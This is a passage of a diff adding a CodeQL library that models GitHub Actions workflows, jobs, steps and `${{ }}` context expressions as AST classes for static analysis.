+ * Gets the sum of the length of the lines up to the given index.
+ */
+bindingset[text]
+int partialLineLengthSum(string text, int i) {
+ i in [0 .. count(text.splitAt("\n"))] and
+ result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length)
+}
+
+/**
+ * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string.
+ * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions.
+ * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes.
+ * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }}
+ */
+string getASimpleReferenceExpression(YamlString s, int offset) {
+ // We use `regexpFind` to obtain *all* matches of `${{...}}`,
+ // not just the last (greedy match) or first (reluctant match).
+ result =
+ s.getValue()
+ .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset)
+ .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1)
+}
+
+private newtype TAstNode =
+ TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) {
+ raw = getASimpleReferenceExpression(value, exprOffset) and
+ exists(YamlMapping m |
+ (
+ exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i))
+ or
+ exists(int i |
+ m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i)
+ )
+ )
+ )
+ } or
+ TCompositeAction(YamlMapping n) {
+ n instanceof YamlDocument and
+ n.getFile().getBaseName() = ["action.yml", "action.yaml"] and
+ n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite"
+ } or
+ TWorkflowNode(YamlMapping n) {
+ n instanceof YamlDocument and
+ n.lookup("jobs") instanceof YamlMapping
+ } or
+ TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or
+ TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or
+ TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or
+ TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or
+ TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or
+ TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or
+ TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or
+ TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or
+ TStepNode(YamlMapping n) {
+ exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n)
+ } or
+ TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or
+ TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or
+ TScalarValueNode(YamlScalar n) {
+ exists(YamlMapping m
| m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n)
+ }
+
+abstract class AstNodeImpl extends TAstNode {
+ abstract AstNodeImpl getAChildNode();
+
+ abstract AstNodeImpl getParentNode();
+
+ abstract string getAPrimaryQlClass();
+
+ abstract Location getLocation();
+
+ abstract YamlNode getNode();
+
+ abstract string toString();
+
+ /**
+ * Gets the enclosing Job.
+ */
+ JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() }
+
+ /**
+ * Gets the enclosing workflow statement.
+ */
+ WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() }
+
+ /**
+ * Gets a environment variable expression by name in the scope of the current node.
+ */
+ ExpressionImpl getInScopeEnvVarExpr(string name) {
+ exists(EnvImpl env |
+ env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and
+ env.getParentNode().getAChildNode*() = this
+ )
+ }
+}
+
+class ScalarValueImpl extends AstNodeImpl, TScalarValueNode {
+ YamlScalar value;
+
+ ScalarValueImpl() { this = TScalarValueNode(value) }
+
+ override string toString() { result = value.getValue() }
+
+ override ExpressionImpl getAChildNode() { result.getParentNode() = this }
+
+ override AstNodeImpl getParentNode() {
+ exists(AstNodeImpl n | n.getAChildNode() = this and result = n)
+ }
+
+ override string getAPrimaryQlClass() { result = "ScalarValueImpl" }
+
+ override Location getLocation() { result = value.getLocation() }
+
+ override YamlNode getNode() { result = value }
+}
+
+class ExpressionImpl extends AstNodeImpl, TExpressionNode {
+ YamlNode key;
+ YamlString value;
+ string rawExpression;
+ string expression;
+ int exprOffset;
+
+ ExpressionImpl() {
+ this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and
+ expression =
+ rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1)
+ }
+
+ override string toString() { result = expression }
+
+ override AstNodeImpl getAChildNode() { none() }
+
+
override AstNodeImpl getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override YamlNode getNode() { none() } + + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 
1 and
+ el = loc.getEndLine() and
+ sc = key.getLocation().getStartColumn() and
+ ec = loc.getEndColumn()
+ )
+ }
+
+ override Location getLocation() {
+ exists(Location loc |
+ this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(),
+ loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and
+ result = loc
+ )
+ }
+
+ predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) {
+ path = value.getFile().getAbsolutePath() and
+ this.expressionLocation(sl, sc, el, ec)
+ }
+}
+
+class CompositeActionImpl extends AstNodeImpl, TCompositeAction {
+ YamlMapping n;
+
+ CompositeActionImpl() { this = TCompositeAction(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ // override AstNodeImpl getAChildNode() {
+ // result = this.getInputs() or
+ // result = this.getOutputs() or
+ // result = this.getRuns()
+ // }
+ override AstNodeImpl getParentNode() { none() }
+
+ override string getAPrimaryQlClass() { result = "CompositeActionImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ RunsImpl getRuns() { result.getNode() = n.lookup("runs") }
+
+ OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") }
+
+ ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() }
+
+ ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) }
+
+ InputsImpl getInputs() { result.getNode() = n.lookup("inputs") }
+
+ InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) }
+
+ InputImpl getInput(string name) {
+ n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and
+ result.getNode().getValue() = name
+ }
+}
+
+class WorkflowImpl extends AstNodeImpl, TWorkflowNode {
+ YamlMapping n;
+
+ WorkflowImpl() { this = TWorkflowNode(n) }
+
+ override string toString() { result = n.toString() }
+
+
override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ // override AstNodeImpl getAChildNode() {
+ // result = this.getAJob() or
+ // result = this.getStrategy() or
+ // result = this.getEnv() or
+ // result = this.getPermissions()
+ // }
+ override AstNodeImpl getParentNode() { none() }
+
+ override string getAPrimaryQlClass() { result = "WorkflowImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */
+ // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") }
+ /** Gets the 'global' `env` mapping in this workflow. */
+ EnvImpl getEnv() { result.getNode() = n.lookup("env") }
+
+ /** Gets the name of the workflow. */
+ string getName() { result = n.lookup("name").(YamlString).getValue() }
+
+ /** Gets the job within this workflow with the given job ID. */
+ JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId }
+
+ /** Gets a job within this workflow */
+ JobImpl getAJob() { result = this.getJob(_) }
+
+ /** Workflow is triggered by given trigger event */
+ predicate hasTriggerEvent(string trigger) {
+ exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger))
+ }
+
+ /** Gets the trigger event that starts this workflow. */
+ string getATriggerEvent() {
+ exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result))
+ }
+
+ /** Gets the permissions granted to this workflow. */
+ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") }
+
+ /** Gets the strategy for this workflow.
*/
+ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") }
+}
+
+class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl {
+ YamlValue workflow_call;
+
+ ReusableWorkflowImpl() {
+ n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call
+ }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ // override AstNodeImpl getAChildNode() {
+ // result = super.getAChildNode() or
+ // result = this.getInputs() or
+ // result = this.getOutputs()
+ // }
+ OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") }
+
+ ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() }
+
+ ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) }
+
+ InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") }
+
+ InputImpl getAnInput() {
+ workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _)
+ }
+
+ InputImpl getInput(string name) {
+ workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and
+ result.getNode().(YamlString).getValue() = name
+ }
+}
+
+class RunsImpl extends AstNodeImpl, TRunsNode {
+ YamlMapping n;
+
+ RunsImpl() { this = TRunsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ //override AstNodeImpl getAChildNode() { result = this.getAStep() }
+ override CompositeActionImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "RunsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets the action that this `runs` mapping is in. */
+ CompositeActionImpl getAction() { result = this.getParentNode() }
+
+ /** Gets any steps that are defined within this job.
*/
+ StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) }
+
+ /** Gets the step at the given index within this job. */
+ StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) }
+}
+
+class InputsImpl extends AstNodeImpl, TInputsNode {
+ YamlMapping n;
+
+ InputsImpl() { this = TInputsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ //override AstNodeImpl getAChildNode() { result = this.getAnInput() }
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "InputsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ InputImpl getAnInput() { n.maps(result.getNode(), _) }
+
+ InputImpl getInput(string name) {
+ n.maps(result.getNode(), _) and
+ result.getNode().(YamlString).getValue() = name
+ }
+}
+
+class InputImpl extends AstNodeImpl, TInputNode {
+ YamlValue n;
+
+ InputImpl() { this = TInputNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override InputsImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "InputImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlScalar getNode() { result = n }
+}
+
+class OutputsImpl extends AstNodeImpl, TOutputsNode {
+ YamlMapping n;
+
+ OutputsImpl() { this = TOutputsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() }
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() {
result = "OutputsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets an output expression. */
+ ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) }
+
+ /** Gets a specific output expression by name. */
+ ExpressionImpl getOutputExpr(string name) {
+ exists(YamlScalar l |
+ l = result.getParentNode().getNode() and
+ (
+ n.lookup(name).(YamlMapping).lookup("value") = l or
+ n.lookup(name) = l
+ )
+ )
+ }
+
+ string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) }
+}
+
+class PermissionsImpl extends AstNodeImpl, TPermissionsNode {
+ YamlMapping n;
+
+ PermissionsImpl() { this = TPermissionsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "PermissionsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+}
+
+class StrategyImpl extends AstNodeImpl, TStrategyNode {
+ YamlMapping n;
+
+ StrategyImpl() { this = TStrategyNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() }
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "StrategyImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets a specific matric expression (YamlMapping) by name. */
+ ExpressionImpl getMatrixVarExpr(string name) {
+ n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode()
+ }
+
+ /** Gets a specific matric expression (YamlMapping) by name.
*/
+ ExpressionImpl getAMatrixVarExpr() {
+ n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode()
+ }
+}
+
+class NeedsImpl extends AstNodeImpl, TNeedsNode {
+ YamlMappingLikeNode n;
+
+ NeedsImpl() { this = TNeedsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override JobImpl getParentNode() { result.getNode().lookup("needs") = n }
+
+ override string getAPrimaryQlClass() { result = "NeedsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMappingLikeNode getNode() { result = n }
+
+ /** Gets a job that needs to be run before the job defining these needs. */
+ JobImpl getANeededJob() {
+ result.getId() = n.getNode(_).(YamlString).getValue() and
+ result.getLocation().getFile() = n.getLocation().getFile()
+ }
+}
+
+class JobImpl extends AstNodeImpl, TJobNode {
+ YamlMapping n;
+ string jobId;
+ WorkflowImpl workflow;
+
+ JobImpl() {
+ this = TJobNode(n) and
+ workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n
+ }
+
+ // TODO: REMOVE
+ override string toString() { result = "Job: " + jobId }
+
+ //override string toString() { result = n.toString() }
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override WorkflowImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "JobImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets the ID of this job, as a string. */
+ string getId() { result = jobId }
+
+ /** Gets the workflow this job belongs to. */
+ WorkflowImpl getWorkflow() { result = workflow }
+
+ EnvImpl getEnv() { result.getNode() = n.lookup("env") }
+
+ /** Gets a needed job.
*/ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the permissions for this job. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this job. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class LocalJobImpl extends JobImpl { + LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } + + /** Gets any steps that are defined within this job. */ + StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } +} + +class StepImpl extends AstNodeImpl, TStepNode { + YamlMapping n; + + StepImpl() { this = TStepNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StepImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the ID of this step, if any. 
*/ + string getId() { result = n.lookup("id").(YamlString).getValue() } + + /** Gets the value of the `if` field in this step, if any. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } +} + +class IfImpl extends AstNodeImpl, TIfNode { + YamlValue n; + + IfImpl() { this = TIfNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "IfImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the condition that must be satisfied for this job to run. */ + string getCondition() { result = n.(YamlScalar).getValue() } +} + +class EnvImpl extends AstNodeImpl, TEnvNode { + YamlMapping n; + + EnvImpl() { this = TEnvNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.(JobImpl).getEnv() = this or + result.(StepImpl).getEnv() = this or + result.(WorkflowImpl).getEnv() = this + } + + override string getAPrimaryQlClass() { result = "EnvImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() } + + /** Gets an environment variable expression. 
*/ + ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() } +} + +abstract class UsesImpl extends AstNodeImpl { + abstract string getCallee(); + + abstract string getVersion(); + + abstract ExpressionImpl getArgumentExpr(string key); +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + + /** Gets the argument expression for the given key. 
*/ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } + + /** Gets the argument expression for the given key. 
*/ + override ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + + RunImpl() { this.getNode().lookup("run") = script } + + string getScript() { result = script.getValue() } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + + // TODO: REMOVE + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +abstract class ContextExpressionImpl extends ExpressionImpl { + // TODO: REMOVE + // ContextExpressionImpl() { + // expression + // .regexpMatch([ + // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + // matrixCtxRegex() + // ]) + // } + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] +} + +/** + * Holds for an expression accesing the `steps` context. 
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. `${{ steps.changed-files.outputs.all_changed_files }}`
+ */
+class StepsExpressionImpl extends ContextExpressionImpl {
+ string stepId;
+ string fieldName;
+
+ StepsExpressionImpl() {
+ expression.regexpMatch(stepsCtxRegex()) and
+ stepId = expression.regexpCapture(stepsCtxRegex(), 1) and
+ fieldName = expression.regexpCapture(stepsCtxRegex(), 2)
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ this.getLocation().getFile() = result.getLocation().getFile() and
+ result.(StepImpl).getId() = stepId
+ }
+}
+
+/**
+ * Holds for an expression accesing the `needs` context.
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. `${{ needs.job1.outputs.foo}}`
+ */
+class NeedsExpressionImpl extends ContextExpressionImpl {
+ JobImpl neededJob;
+ string fieldName;
+
+ NeedsExpressionImpl() {
+ expression.regexpMatch(needsCtxRegex()) and
+ fieldName = expression.regexpCapture(needsCtxRegex(), 2) and
+ neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and
+ neededJob.getLocation().getFile() = this.getLocation().getFile()
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ this.getEnclosingJob().getANeededJob() = neededJob and
+ (
+ // regular jobs
+ neededJob.getOutputs() = result
+ or
+ // reusable workflow calling jobs
+ neededJob.(ExternalJobImpl) = result
+ )
+ }
+}
+
+/**
+ * Holds for an expression accesing the `jobs` context.
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. 
`${{ jobs.job1.outputs.foo}}` (within reusable workflows)
+ */
+class JobsExpressionImpl extends ContextExpressionImpl {
+ string jobId;
+ string fieldName;
+
+ JobsExpressionImpl() {
+ expression.regexpMatch(jobsCtxRegex()) and
+ jobId = expression.regexpCapture(jobsCtxRegex(), 1) and
+ fieldName = expression.regexpCapture(jobsCtxRegex(), 2)
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ exists(JobImpl job |
+ job.getId() = jobId and
+ job.getLocation().getFile() = this.getLocation().getFile() and
+ job.getOutputs() = result
+ )
+ }
+}
+
+/**
+ * Holds for an expression the `inputs` context.
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. `${{ inputs.foo }}`
+ */
+class InputsExpressionImpl extends ContextExpressionImpl {
+ string fieldName;
+
+ InputsExpressionImpl() {
+ expression.regexpMatch(inputsCtxRegex()) and
+ fieldName = expression.regexpCapture(inputsCtxRegex(), 1)
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ result.getLocation().getFile() = this.getLocation().getFile() and
+ (
+ exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result)
+ or
+ exists(CompositeActionImpl a | a.getInput(fieldName) = result)
+ )
+ }
+}
+
+/**
+ * Holds for an expression accesing the `env` context.
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. `${{ env.foo }}`
+ */
+class EnvExpressionImpl extends ContextExpressionImpl {
+ string fieldName;
+
+ EnvExpressionImpl() {
+ expression.regexpMatch(envCtxRegex()) and
+ fieldName = expression.regexpCapture(envCtxRegex(), 1)
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ exists(AstNodeImpl s |
+ s.getInScopeEnvVarExpr(fieldName) = result and
+ s.getAChildNode*() = this
+ )
+ }
+}
+
+/**
+ * Holds for an expression accesing the `matrix` context. 
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
+ * e.g. `${{ matrix.foo }}`
+ */
+class MatrixExpressionImpl extends ContextExpressionImpl {
+ string fieldName;
+
+ MatrixExpressionImpl() {
+ expression.regexpMatch(matrixCtxRegex()) and
+ fieldName = expression.regexpCapture(matrixCtxRegex(), 1)
+ }
+
+ override string getFieldName() { result = fieldName }
+
+ override AstNodeImpl getTarget() {
+ exists(WorkflowImpl w |
+ w.getStrategy().getMatrixVarExpr(fieldName) = result and
+ w.getAChildNode*() = this
